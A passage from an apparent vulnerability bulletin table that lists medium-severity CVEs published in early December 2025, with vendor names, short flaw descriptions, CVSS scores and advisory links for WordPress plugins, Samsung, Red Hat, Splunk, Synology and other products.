APP(com.rarlab.rar) <=V7.11.build127 Path Traversal https://github.com/Secsys-FDU/AF_CVEs/blob/main/com.rarlab.rar/RAR%20APP%20Arbitrary%20File%20Write%20and%20Read%20Vulnerability.md |
| realloc--myLCO | The myLCO plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the `$_SERVER['PHP_SELF']` parameter in all versions up to, and including, 0.8.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2025-12-06 | 6.1 | CVE-2025-13626 | https://www.wordfence.com/threat-intel/vulnerabilities/id/132efd40-1c90-4d2a-a87c-504526b7a7d4?source=cve https://wordpress.org/plugins/mylco https://plugins.trac.wordpress.org/browser/mylco/trunk/myLCO.php#L438 https://plugins.trac.wordpress.org/browser/mylco/tags/0.8.1/myLCO.php#L438 |
| realmag777--HUSKY Products Filter Professional for WooCommerce | The HUSKY - Products Filter Professional for WooCommerce plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 1.3.7.2 via the "woof_add_query" and "woof_remove_query" functions due to missing validation on a user controlled key. This makes it possible for authenticated attackers, with subscriber level access and above, to insert or remove arbitrary saved search queries into any user's profile, including administrators. | 2025-12-03 | 4.3 | CVE-2025-13109 | https://www.wordfence.com/threat-intel/vulnerabilities/id/9effc186-c225-4b3b-9b8c-c453505a41de?source=cve https://plugins.trac.wordpress.org/changeset/3400527 |
| Red Hat--Red Hat Ceph Storage 5 | A flaw was found in ansible-collection-community-general. This vulnerability allows for information exposure (IE) of sensitive credentials, specifically plaintext passwords, via verbose output when running Ansible with debug modes. Attackers with access to logs could retrieve these secrets and potentially compromise Keycloak accounts or administrative access. | 2025-12-04 | 5.5 | CVE-2025-14010 | https://access.redhat.com/security/cve/CVE-2025-14010 RHBZ#2418774 |
| Red Hat--Red Hat Enterprise Linux 10 | A flaw was found in util-linux. This vulnerability allows a heap buffer overread when processing 256-byte usernames, specifically within the `setpwnam()` function, affecting SUID (Set User ID) login-utils utilities writing to the password database. | 2025-12-05 | 6.1 | CVE-2025-14104 | https://access.redhat.com/security/cve/CVE-2025-14104 RHBZ#2419369 |
| Red Hat--Red Hat OpenShift Dev Spaces | A container privilege escalation flaw was found in certain CodeReady Workspaces images. This issue stems from the /etc/passwd file being created with group-writable permissions during build time. In certain conditions, an attacker who can execute commands within an affected container, even as a non-root user, can leverage their membership in the root group to modify the /etc/passwd file. This could allow the attacker to add a new user with any arbitrary UID, including UID 0, leading to full root privileges within the container. | 2025-12-02 | 5.2 | CVE-2025-57850 | https://access.redhat.com/security/cve/CVE-2025-57850 RHBZ#2391103 |
| roselldk--WebP Express | The WebP Express plugin for WordPress is vulnerable to information exposure via config files in all versions up to, and including, 0.25.9. This is due to the plugin not properly randomizing the name of the config file to prevent direct access on NGINX. This makes it possible for unauthenticated attackers to extract configuration data. | 2025-12-04 | 5.3 | CVE-2025-11379 | https://www.wordfence.com/threat-intel/vulnerabilities/id/c28479bf-768a-4ab4-8e74-ad367b9b744f?source=cve https://wordpress.org/plugins/webp-express/ |
| roxnor--ShopEngine Elementor WooCommerce Builder Addon All in One WooCommerce Solution | The ShopEngine Elementor WooCommerce Builder Addon plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 4.8.5. This is due to missing nonce validation on the "post_add_to_list" function as well as an incorrect permissions callback in the "Api/init" function. This makes it possible for unauthenticated attackers to add or remove products from a user's wishlist via a forged request, provided they can trick a site's user into performing an action such as clicking on a link. | 2025-12-03 | 4.3 | CVE-2025-12358 | https://www.wordfence.com/threat-intel/vulnerabilities/id/6ed605a1-9544-4b53-8d62-ad89214a4fb8?source=cve https://plugins.trac.wordpress.org/changeset/3401226/shopengine |
| roxnor--Wp Social Login and Register Social Counter | The Wp Social Login and Register Social Counter plugin for WordPress is vulnerable to missing authorization in versions up to, and including, 3.1.3. This is due to the REST routes wslu/v1/check_cache/{type}, wslu/v1/save_cache/{type}, and wslu/v1/settings/clear_counter_cache being registered with permission_callback set to __return_true and lacking capability or nonce validation in their handlers. This makes it possible for unauthenticated attackers to clear or overwrite the social counter cache via crafted REST requests. | 2025-12-05 | 5.3 | CVE-2025-13620 | https://www.wordfence.com/threat-intel/vulnerabilities/id/4fa205d7-61ce-4ab9-b532-fd0b46b0f6a0?source=cve https://plugins.trac.wordpress.org/changeset/3402340/wp-social/tags/3.1.4/inc/admin-rest-api.php |
| saadiqbal--Post SMTP Complete SMTP Solution with Logs, Alerts, Backup SMTP & Mobile App | The Post SMTP plugin for WordPress is vulnerable to authorization bypass in all versions up to, and including, 3.6.1. This is due to the plugin not properly verifying that a user is authorized to update OAuth tokens on the 'handle_gmail_oauth_redirect' function. This makes it possible for authenticated attackers, with subscriber level access and above, to inject invalid or attacker-controlled OAuth credentials. | 2025-12-03 | 5.4 | CVE-2025-12887 | https://www.wordfence.com/threat-intel/vulnerabilities/id/5bd9f312-99e1-4dc2-855d-90339c2e24da?source=cve https://plugins.trac.wordpress.org/changeset/3402203 |
| Samsung Mobile--Galaxy Store for Galaxy Watch | Improper export of Android application components in Galaxy Store for Galaxy Watch prior to version 1.0.06.29 allows a local attacker to install an arbitrary application on Galaxy Store. | 2025-12-02 | 5.9 | CVE-2025-58483 | https://security.samsungmobile.com/serviceWeb.smsb?year=2025&month=12 |
| Samsung Mobile--Samsung Account | Improper input validation in Samsung Account prior to version 15.5.01.1 allows a local attacker to execute an arbitrary script. | 2025-12-02 | 4 | CVE-2025-58486 | https://security.samsungmobile.com/serviceWeb.smsb?year=2025&month=12 |
| Samsung Mobile--Samsung Account | Improper authorization in Samsung Account prior to version 15.5.01.1 allows a local attacker to launch an arbitrary activity with Samsung Account privilege. | 2025-12-02 | 4 | CVE-2025-58487 | https://security.samsungmobile.com/serviceWeb.smsb?year=2025&month=12 |
| Samsung Mobile--Samsung Cloud Assistant | Incorrect default permissions in Samsung Cloud Assistant prior to version 8.0.03.8 allows a local attacker to access partial data in the sandbox. | 2025-12-02 | 4 | CVE-2025-58484 | https://security.samsungmobile.com/serviceWeb.smsb?year=2025&month=12 |
| Samsung Mobile--Samsung Internet | Improper input validation in Samsung Internet prior to version 29.0.0.48 allows local attackers to inject arbitrary script. | 2025-12-02 | 5.5 | CVE-2025-58485 | https://security.samsungmobile.com/serviceWeb.smsb?year=2025&month=12 |
| Samsung Mobile--Samsung Mobile Devices | Improper export of android application components in Dynamic Lockscreen prior to SMR Dec-2025 Release 1 allows local attackers to access files with Dynamic Lockscreen's privilege. | 2025-12-02 | 6.2 | CVE-2025-21080 | https://security.samsungmobile.com/securityUpdate.smsb?year=2025&month=12 |
| Samsung Mobile--Samsung Mobile Devices | Out-of-bounds write in decoding metadata in fingerprint trustlet prior to SMR Dec-2025 Release 1 allows local privileged attackers to write out-of-bounds memory. | 2025-12-02 | 5.7 | CVE-2025-21072 | https://security.samsungmobile.com/securityUpdate.smsb?year=2025&month=12 |
| Samsung Mobile--Samsung Mobile Devices | Improper input validation in libsec-ril.so prior to SMR Dec-2025 Release 1 allows local privileged attackers to write out-of-bounds memory. | 2025-12-02 | 5.6 | CVE-2025-58475 | https://security.samsungmobile.com/securityUpdate.smsb?year=2025&month=12 |
| Samsung Mobile--Samsung Mobile Devices | Out-of-bounds read vulnerability in bootloader prior to SMR Dec-2025 Release 1 allows physical attackers to access out-of-bounds memory. | 2025-12-02 | 4.2 | CVE-2025-58476 | https://security.samsungmobile.com/securityUpdate.smsb?year=2025&month=12 |
| Samsung Mobile--Samsung Mobile Devices | Out-of-bounds write in parsing IFD tag in libimagecodec.quram.so prior to SMR Dec-2025 Release 1 allows remote attackers to access out-of-bounds memory. | 2025-12-02 | 4.3 | CVE-2025-58477 | https://security.samsungmobile.com/securityUpdate.smsb?year=2025&month=12 |
| Samsung Mobile--Samsung Mobile Devices | Out-of-bounds write in libimagecodec.quram.so prior to SMR Dec-2025 Release 1 allows remote attackers to access out-of-bounds memory. | 2025-12-02 | 4.3 | CVE-2025-58478 | https://security.samsungmobile.com/securityUpdate.smsb?year=2025&month=12 |
| Samsung Mobile--Samsung Mobile Devices | Out-of-bounds read in libimagecodec.quram.so prior to SMR Dec-2025 Release 1 allows remote attackers to access out-of-bounds memory. | 2025-12-02 | 4.3 | CVE-2025-58479 | https://security.samsungmobile.com/securityUpdate.smsb?year=2025&month=12 |
| Samsung Mobile--Samsung Mobile Devices | Heap-based buffer overflow in libimagecodec.quram.so prior to SMR Dec-2025 Release 1 allows remote attackers to access out-of-bounds memory. | 2025-12-02 | 4.3 | CVE-2025-58480 | https://security.samsungmobile.com/securityUpdate.smsb?year=2025&month=12 |
| Samsung Mobile--SmartTouchCall | Improper verification of source of a communication channel in SmartTouchCall prior to version 1.0.1.1 allows remote attackers to access sensitive information. User interaction is required for triggering this vulnerability. | 2025-12-02 | 4.5 | CVE-2025-58488 | https://security.samsungmobile.com/serviceWeb.smsb?year=2025&month=12 |
| Seneka Software Hardware Information Technology Trade Contracting and Industry Ltd. Co.--Onaylarm | Improper Enforcement of Behavioral Workflow vulnerability in Seneka Software Hardware Information Technology Trade Contracting and Industry Ltd. Co. Onaylarım allows Functionality Misuse. This issue affects Onaylarım: from 25.09.26.01 through 18112025. | 2025-12-01 | 4.3 | CVE-2025-13129 | https://www.usom.gov.tr/bildirim/tr-25-0422 |
| SGAI--Space1 NAS N1211DS | A vulnerability was determined in SGAI Space1 NAS N1211DS up to 1.0.915. Impacted is the function RENAME_FILE/OPERATE_FILE/NGNIX_UPLOAD of the file /cgi-bin/JSONAPI of the component gsaiagent. This manipulation causes command injection. The attack may be initiated remotely. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-07 | 6.3 | CVE-2025-14184 | VDB-334604; SGAI Space1 NAS N1211DS gsaiagent JSONAPI NGNIX_UPLOAD command injection VDB-334604; CTI Indicators (IOB, IOC, TTP, IOA) Submit #698568; SGAI N1211DS NAS v1.0.915 Command Injection Submit #698569; SGAI N1211DS NAS v1.0.915 Command Injection (Duplicate) Submit #698570; SGAI N1211DS NAS v1.0.915 Command Injection (Duplicate) https://www.notion.so/2b16cf4e528a80858abbf62b721a54b0 https://www.notion.so/2b16cf4e528a80f2ada9dc83651a4013 |
| SGAI--Space1 NAS N1211DS | A vulnerability was found in SGAI Space1 NAS N1211DS up to 1.0.915. This issue affects the function GET_FACTORY_INFO/GET_USER_INFO of the file /cgi-bin/JSONAPI of the component gsaiagent. The manipulation results in unprotected storage of credentials. The attack can be launched remotely. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-07 | 4.3 | CVE-2025-14183 | VDB-334603: SGAI Space1 NAS N1211DS gsaiagent JSONAPI GET_USER_INFO credentials storage; VDB-334603: CTI Indicators (IOB, IOC, TTP, IOA); Submit #698566: SGAI N1211DS NAS v1.0.915 Improper Authentication; Submit #698567: SGAI N1211DS NAS v1.0.915 Improper Authentication (Duplicate); https://www.notion.so/2b16cf4e528a8000b30bd543247fa1bd https://www.notion.so/2b16cf4e528a80859264db63f2340d7a |
| siamlottery--Thai Lottery Widget | The Thai Lottery Widget plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the `thailottery` shortcode in all versions up to, and including, 2.5. This is due to insufficient input sanitization and output escaping on the user supplied `width` and `height` shortcode attributes. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-05 | 6.4 | CVE-2025-13678 | https://www.wordfence.com/threat-intel/vulnerabilities/id/949eb9d6-0c8f-43f1-8580-998ea78c9549?source=cve https://plugins.trac.wordpress.org/browser/thai-lottery-widget/trunk/thailottery.php#L330 https://plugins.trac.wordpress.org/browser/thai-lottery-widget/tags/2.5/thailottery.php#L330 |
| smackcoders--Export All Posts, Products, Orders, Refunds & Users | The Export All Posts, Products, Orders, Refunds & Users plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.19. This is due to missing or incorrect nonce validation on the `parseData` function. This makes it possible for unauthenticated attackers to export sensitive information including user data, email addresses, password hashes, and WooCommerce data to an attacker-controlled file path on the server via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2025-12-02 | 6.5 | CVE-2025-13606 | https://www.wordfence.com/threat-intel/vulnerabilities/id/3511e110-d091-447d-87c0-25d33900bc30?source=cve https://plugins.trac.wordpress.org/changeset/3405694/ |
| smallstep--certificates | Step CA is an online certificate authority for secure, automated certificate management for DevOps. Prior to 0.29.0, there is an improper authorization check for SSH certificate revocation. This affects deployments configured with the SSHPOP provisioner. This vulnerability is fixed in 0.29.0. | 2025-12-03 | 5 | CVE-2025-66406 | https://github.com/smallstep/certificates/security/advisories/GHSA-j7c9-79x7-8hpr |
| Sobey--Media Convergence System | A vulnerability has been found in Sobey Media Convergence System 2.0/2.1. This vulnerability affects unknown code of the file /sobey-mchEditor/watermark/upload. The manipulation of the argument File leads to path traversal. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. | 2025-12-07 | 6.3 | CVE-2025-14182 | VDB-334602: Sobey Media Convergence System upload path traversal; VDB-334602: CTI Indicators (IOB, IOC, TTP, IOA); Submit #698561: Chengdu Sobey Digital Technology Co., Ltd. Sobey Media Convergence System V2.0-2.1 Uploaded File; https://github.com/hacker-routing/cve/issues/1 |
| Socomec--DIRIS Digiware M-70 | A cleartext transmission vulnerability exists in the WEBVIEW-M functionality of Socomec DIRIS Digiware M-70 1.6.9. A specially crafted HTTP request can lead to a disclosure of sensitive information. An attacker can sniff network traffic to trigger this vulnerability. | 2025-12-01 | 5.9 | CVE-2024-48894 | https://talosintelligence.com/vulnerability_reports/TALOS-2024-2115 https://www.socomec.fr/sites/default/files/2025-04/CVE-2024-48894---Diris-Digiware-Webview-_VULNERABILITIES_2025-04-11-17-22-18_English_0.pdf |
| softdiscover--Zigaform Price Calculator & Cost Estimation Form Builder Lite | The Zigaform plugin for WordPress is vulnerable to Sensitive Information Exposure in versions up to, and including, 7.6.5. This is due to the plugin exposing a public AJAX endpoint that retrieves form submission data without performing authorization checks to verify ownership or access rights. This makes it possible for unauthenticated attackers to extract sensitive form submission data including personal information, payment details, and other private data via the rocket_front_payment_seesummary action by enumerating sequential form_r_id values. | 2025-12-02 | 5.3 | CVE-2025-13696 | https://www.wordfence.com/threat-intel/vulnerabilities/id/47f9a466-2826-4835-b06e-14cf4ceb7567?source=cve https://plugins.trac.wordpress.org/browser/zigaform-calculator-cost-estimation-form-builder-lite/trunk/modules/formbuilder/controllers/uiform-fb-controller-frontend.php#L106 https://plugins.trac.wordpress.org/browser/zigaform-calculator-cost-estimation-form-builder-lite/tags/7.6.5/modules/formbuilder/controllers/uiform-fb-controller-frontend.php#L106 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3406507%40zigaform-calculator-cost-estimation-form-builder-lite&new=3406507%40zigaform-calculator-cost-estimation-form-builder-lite&sfp_email=&sfph_mail= https://github.com/Softdiscover/Zigaform-WP-Cost-Estimator-Lite/commit/f129d8dd1fb3ab0535c7eb18d52fc49141ab36c8 |
| sozan45--Ultra Skype Button | The Ultra Skype Button plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'btn_id' parameter of the [ultra_skype] shortcode in all versions up to, and including, 1.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-06 | 6.4 | CVE-2025-13898 | https://www.wordfence.com/threat-intel/vulnerabilities/id/20b3c88f-a0df-4814-83b6-27440c5ad38e?source=cve https://plugins.trac.wordpress.org/browser/ultra-skype-button/trunk/index.php#L39 https://plugins.trac.wordpress.org/browser/ultra-skype-button/tags/1.0/index.php#L39 https://plugins.trac.wordpress.org/browser/ultra-skype-button/trunk/index.php#L44 https://plugins.trac.wordpress.org/browser/ultra-skype-button/tags/1.0/index.php#L44 |
| Splunk--Splunk Enterprise | In Splunk Enterprise versions below 10.0.1, 9.4.6, 9.3.8, and 9.2.10, and Splunk Cloud Platform versions below 10.1.2507.4, 10.0.2503.6, and 9.3.2411.117.125, an unauthenticated attacker can inject American National Standards Institute (ANSI) escape codes into Splunk log files due to improper validation at the /en-US/static/ web endpoint. This may allow them to poison, forge, or obfuscate sensitive log data through specially crafted HTTP requests, potentially impacting log integrity and detection capabilities. | 2025-12-03 | 5.3 | CVE-2025-20384 | https://advisory.splunk.com/advisories/SVD-2025-1203 |
| Splunk--Splunk Enterprise | In Splunk Enterprise versions below 10.0.2, 9.4.6, 9.3.8, and 9.2.10, and below 3.9.10, 3.8.58, and 3.7.28 of Splunk Secure Gateway app in Splunk Cloud Platform, a low-privileged user that does not hold the "admin" or "power" Splunk roles and subscribes to mobile push notifications could receive notifications that disclose the title and description of the report or alert even if they do not have access to view the report or alert. | 2025-12-03 | 4.3 | CVE-2025-20383 | https://advisory.splunk.com/advisories/SVD-2025-1202 |
| Splunk--Splunk Enterprise | In Splunk Enterprise versions below 10.0.2, 9.4.6, 9.3.8, and 9.2.10, and versions below 3.9.10, 3.8.58 and 3.7.28 of the Splunk Secure Gateway app on Splunk Cloud Platform, a low-privileged user that does not hold the "admin" or "power" Splunk roles could craft a malicious payload through the `label` column field after adding a new device in the Splunk Secure Gateway app. This could potentially lead to a client-side denial of service (DoS). | 2025-12-03 | 4.3 | CVE-2025-20389 | https://advisory.splunk.com/advisories/SVD-2025-1208 |
| Splunk--Splunk MCP Server | In Splunk MCP Server app versions below 0.2.4, a user with access to the "run_splunk_query" Model Context Protocol (MCP) tool could bypass the SPL command allowlist controls in MCP by embedding SPL commands as sub-searches, leading to unauthorized actions beyond the intended MCP restrictions. | 2025-12-03 | 5.4 | CVE-2025-20381 | https://advisory.splunk.com/advisories/SVD-2025-1210 |
| Sprecher Automation--SPRECON-E-C | Insufficient encryption strength in Sprecher Automation SPRECON-E-C, SPRECON-E-P, and SPRECON-E-T3 allows a local unprivileged attacker to extract data from update images and thus obtain limited information about the architecture and internal processes. | 2025-12-02 | 4 | CVE-2025-41743 | https://www.sprecher-automation.com/fileadmin/itSecurity/PDF/SPR-2511043_de.pdf |
| stevejburge--Tag, Category, and Taxonomy Manager AI Autotagger with OpenAI | The Tag, Category, and Taxonomy Manager - AI Autotagger with OpenAI plugin for WordPress is vulnerable to time-based SQL Injection via the "getTermsForAjax" function in all versions up to, and including, 3.40.1. This is due to insufficient escaping on the user supplied parameters and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with contributor level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database granted they have metabox access for the taxonomy (enabled by default for contributors). | 2025-12-03 | 6.5 | CVE-2025-13359 | https://www.wordfence.com/threat-intel/vulnerabilities/id/d9bebdc0-1625-4dc4-8c92-37f379868cd5?source=cve https://github.com/TaxoPress/TaxoPress/commit/1097a22181aa10ce55cc9cd5fa8495f7494e18ea |
| stevejburge--Tag, Category, and Taxonomy Manager AI Autotagger with OpenAI | The Tag, Category, and Taxonomy Manager - AI Autotagger with OpenAI plugin for WordPress is vulnerable to time-based blind SQL Injection via the 'existing_terms_orderby' parameter in the AI preview AJAX endpoint in all versions up to, and including, 3.40.1. This is due to insufficient escaping on user-supplied parameters and lack of SQL query parameterization. This makes it possible for authenticated attackers, with Contributor-level access and above who have AI metabox permissions, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database, cause performance degradation, or enable data inference through time-based techniques. | 2025-12-06 | 6.5 | CVE-2025-13922 | https://www.wordfence.com/threat-intel/vulnerabilities/id/f40cc632-c6af-4c8b-a455-76319f7fe151?source=cve https://plugins.trac.wordpress.org/browser/simple-tags/tags/3.40.1/inc/class.admin.php#L1406 https://plugins.trac.wordpress.org/browser/simple-tags/tags/3.40.1/modules/taxopress-ai/classes/TaxoPressAiAjax.php#L180 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3408243%40simple-tags%2Ftrunk&old=3388829%40simple-tags%2Ftrunk&sfp_email=&sfph_mail=#file17 |
| stevejburge--Tag, Category, and Taxonomy Manager AI Autotagger with OpenAI | The Tag, Category, and Taxonomy Manager - AI Autotagger with OpenAI plugin for WordPress is vulnerable to authorization bypass in all versions up to, and including, 3.40.1. This is due to the plugin not properly verifying that a user is authorized to perform an action in the "taxopress_merge_terms_batch" function. This makes it possible for authenticated attackers, with subscriber level access and above, to merge or delete arbitrary taxonomy terms. | 2025-12-03 | 4.3 | CVE-2025-13354 | https://www.wordfence.com/threat-intel/vulnerabilities/id/05c1ee52-02c9-440b-9269-14ea8b73be45?source=cve https://github.com/TaxoPress/TaxoPress/commit/5eb2cee861ebd109152eea968aca0259c078c8b0 |
| sumotto--CSV Sumotto | The CSV Sumotto plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the `$_SERVER['PHP_SELF']` variable in all versions up to, and including, 1.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2025-12-06 | 6.1 | CVE-2025-13894 | https://www.wordfence.com/threat-intel/vulnerabilities/id/e6aa8089-1c29-41ef-b2c0-06841751f7a5?source=cve https://plugins.trac.wordpress.org/browser/csv-sumotto/trunk/csv_sumotto_settings.php#L53 |
| Sunbird--DCIM dcTrack | DCIM dcTrack platforms utilize default and hard-coded credentials for access. An attacker could use these credentials to administer the database, escalate privileges on the platform or execute system commands on the host. | 2025-12-04 | 6.7 | CVE-2025-66237 | https://www.cisa.gov/news-events/ics-advisories/icsa-25-338-05 https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2025/icsa-25-338-05.json |
| switch2mac--WP-SOS-Donate Donation Sidebar Plugin | The WP-SOS-Donate Donation Sidebar Plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the `$_SERVER['PHP_SELF']` parameter in all versions up to, and including, 0.9.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2025-12-05 | 6.1 | CVE-2025-13625 | https://www.wordfence.com/threat-intel/vulnerabilities/id/5123c672-e769-4d44-9912-e159d3e186c1?source=cve https://wordpress.org/plugins/wp-sos-donate/ https://plugins.trac.wordpress.org/browser/wp-sos-donate/trunk/wp-sos-donate_options.php#L45 https://plugins.trac.wordpress.org/browser/wp-sos-donate/tags/0.9.2/wp-sos-donate_options.php#L45 |
| sylabs--singularity | SingularityCE and SingularityPRO are open source container platforms. Prior to SingularityCE 4.3.5 and SingularityPRO 4.1.11 and 4.3.5, if a user relies on LSM restrictions to prevent malicious operations then, under certain circumstances, an attacker can redirect the LSM label write operation so that it is ineffective. The attacker must cause the user to run a malicious container image that redirects the mount of /proc to the destination of a shared mount, either known to be configured on the target system, or that will be specified by the user when running the container. The attacker must also control the content of the shared mount, for example through another malicious container which also binds it, or as a user with relevant permissions on the host system it is bound from. This vulnerability is fixed in SingularityCE 4.3.5 and SingularityPRO 4.1.11 and 4.3.5. | 2025-12-02 | 4.5 | CVE-2025-64750 | https://github.com/sylabs/singularity/security/advisories/GHSA-wwrx-w7c9-rf87 https://github.com/opencontainers/runc/security/advisories/GHSA-cgrx-mc8f-2prm https://github.com/sylabs/singularity/pull/3850 https://github.com/sylabs/singularity/commit/27882963879a7af1699fd6511c3f5f1371d80f33 https://github.com/sylabs/singularity/commit/5af3e790c40593591dfc26d0692e4d4b21c29ba0 https://github.com/advisories/GHSA-fh74-hm69-rqjw |
| Synaptics--Synaptics Fingerprint Driver | A carefully crafted DLL, copied to C:\ProgramData\Synaptics folder, allows a local user to execute arbitrary code with elevated privileges during driver installation. | 2025-12-01 | 6.6 | CVE-2025-11772 | https://www.synaptics.com/sites/default/files/2025-12/fingerprint-driver-co-installer-security-brief-2025-12-01.pdf |
| Synology--BeeDrive for desktop | Origin validation error vulnerability in BeeDrive in Synology BeeDrive for desktop before 1.4.3-13973 allows local users to write arbitrary files with non-sensitive information via unspecified vectors. | 2025-12-04 | 5.6 | CVE-2025-8074 | Synology-SA-25:09 BeeDrive for desktop |
| Synology--DiskStation Manager (DSM) | Improper control of dynamically-managed code resources vulnerability in WebAPI component in Synology DiskStation Manager (DSM) before 7.1.1-42962-8 and 7.2.1-69057-2 and 7.2.2-72806 and Synology Unified Controller (DSMUC) before 3.1.4-23079 allows remote authenticated users to obtain privileges without consent via unspecified vectors. | 2025-12-04 | 4.3 | CVE-2024-5401 | Synology-SA-24:27 DSM |
| Synology--Synology Mail Server | A vulnerability in Synology Mail Server allows remote authenticated attackers to read and write non-sensitive settings, and disable some non-critical functions. | 2025-12-04 | 6.3 | CVE-2025-2848 | Synology-SA-25:05 Mail Server |
| Synology--Synology Router Manager (SRM) | A vulnerability in FileStation thumb cgi allows remote authenticated users to read/write image files. | 2025-12-04 | 5.4 | CVE-2025-29843 | Synology-SA-25:04 SRM |
| Synology--Synology Router Manager (SRM) | A vulnerability in FileStation file cgi allows remote authenticated users to read file metadata and path information. | 2025-12-04 | 4.3 | CVE-2025-29844 | Synology-SA-25:04 SRM |
| Synology--Synology Router Manager (SRM) | A vulnerability in VideoPlayer2 subtitle cgi allows remote authenticated users to read .srt files. | 2025-12-04 | 4.3 | CVE-2025-29845 | Synology-SA-25:04 SRM |
| takeads--Takeads | The Takeads plugin for WordPress is vulnerable to authorization bypass in all versions up to, and including, 1.0.13. This is due to the plugin not properly verifying that a user is authorized to perform an action. This makes it possible for authenticated attackers, with subscriber-level access and above, to delete the plugin's configuration options. | 2025-12-05 | 4.3 | CVE-2025-12370 | https://www.wordfence.com/threat-intel/vulnerabilities/id/9f3619d9-7572-439e-a284-d59ef5de08f3?source=cve https://plugins.trac.wordpress.org/browser/monetize-link/tags/1.0.13/src/MLP_Ajax.php#L8 |
| teamdream--dream gallery | The dream gallery plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0. This is due to missing or incorrect nonce validation on the 'dreampluginsmain' AJAX action. This makes it possible for unauthenticated attackers to update the plugin's settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2025-12-05 | 6.1 | CVE-2025-13621 | https://www.wordfence.com/threat-intel/vulnerabilities/id/3cdf6ba0-2866-4347-8518-bb1d2e40bab3?source=cve https://plugins.trac.wordpress.org/browser/dream-gallery/tags/1.0/dreamgallery.php#L254 https://plugins.trac.wordpress.org/browser/dream-gallery/tags/1.0/dreamgallery.php#L257 https://plugins.trac.wordpress.org/browser/dream-gallery/tags/1.0/templates/front.php#L38 https://plugins.trac.wordpress.org/browser/dream-gallery/trunk/dreamgallery.php#L254 |
| techjewel--Fluent Booking The Ultimate Appointments Scheduling, Events Booking, Events Calendar Solution | The Fluent Booking plugin for WordPress is vulnerable to unauthorized calendar import and management due to a missing capability check on the "importCalendar" function in all versions up to, and including, 1.9.11. This makes it possible for authenticated attackers, with subscriber level access and above, to import arbitrary calendars and manage them. | 2025-12-03 | 4.3 | CVE-2025-13756 | https://www.wordfence.com/threat-intel/vulnerabilities/id/7860dfa8-de76-4ca3-bd80-98550afab56b?source=cve https://plugins.trac.wordpress.org/changeset/3404176/fluent-booking/tags/1.10.0/app/Hooks/Handlers/DataImporter.php |
| techjewel--Fluent Forms Customizable Contact Forms, Survey, Quiz, & Conversational Form Builder | The Fluent Forms - Customizable Contact Forms, Survey, Quiz, & Conversational Form Builder plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 6.1.7 via the 'submission_id' parameter due to missing validation on a user controlled key within the confirmScaPayment() function. This makes it possible for unauthenticated attackers to mark arbitrary submissions as failed via crafted requests to the endpoint granted they can guess or enumerate a valid submission identifier. | 2025-12-06 | 5.3 | CVE-2025-13748 | https://www.wordfence.com/threat-intel/vulnerabilities/id/c2aee799-4e4c-4a41-8b76-e2ad576fe2e2?source=cve https://plugins.trac.wordpress.org/changeset/3406804/fluentform/tags/6.1.8/app/Modules/Payments/PaymentMethods/Stripe/StripeInlineProcessor.php |
| Tekrom Technology Inc.--T-Soft E-Commerce | Cross-Site Request Forgery (CSRF) vulnerability in Tekrom Technology Inc. T-Soft E-Commerce allows Cross Site Request Forgery. This issue affects T-Soft E-Commerce: through 28112025. | 2025-12-01 | 5.4 | CVE-2025-13296 | https://www.usom.gov.tr/bildirim/tr-25-0421 |
| themeisle--Visualizer: Tables and Charts Manager for WordPress | The Visualizer: Tables and Charts Manager for WordPress plugin for WordPress is vulnerable to SQL Injection via the 'query' parameter in all versions up to, and including, 3.11.12 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Contributor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. Version 3.11.13 raises the minimum user-level for exploitation to administrator. 3.11.14 fully patches the vulnerability. | 2025-12-02 | 6.5 | CVE-2025-12483 | https://www.wordfence.com/threat-intel/vulnerabilities/id/94392c66-6e50-48bb-93cb-9aa9d0229761?source=cve https://plugins.trac.wordpress.org/browser/visualizer/tags/3.11.12/classes/Visualizer/Gutenberg/Block.php#L499 https://plugins.trac.wordpress.org/browser/visualizer/tags/3.11.12/classes/Visualizer/Source/Query.php#L173 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3405160%40visualizer%2Ftrunk&old=3355840%40visualizer%2Ftrunk&sfp_email=&sfph_mail= |
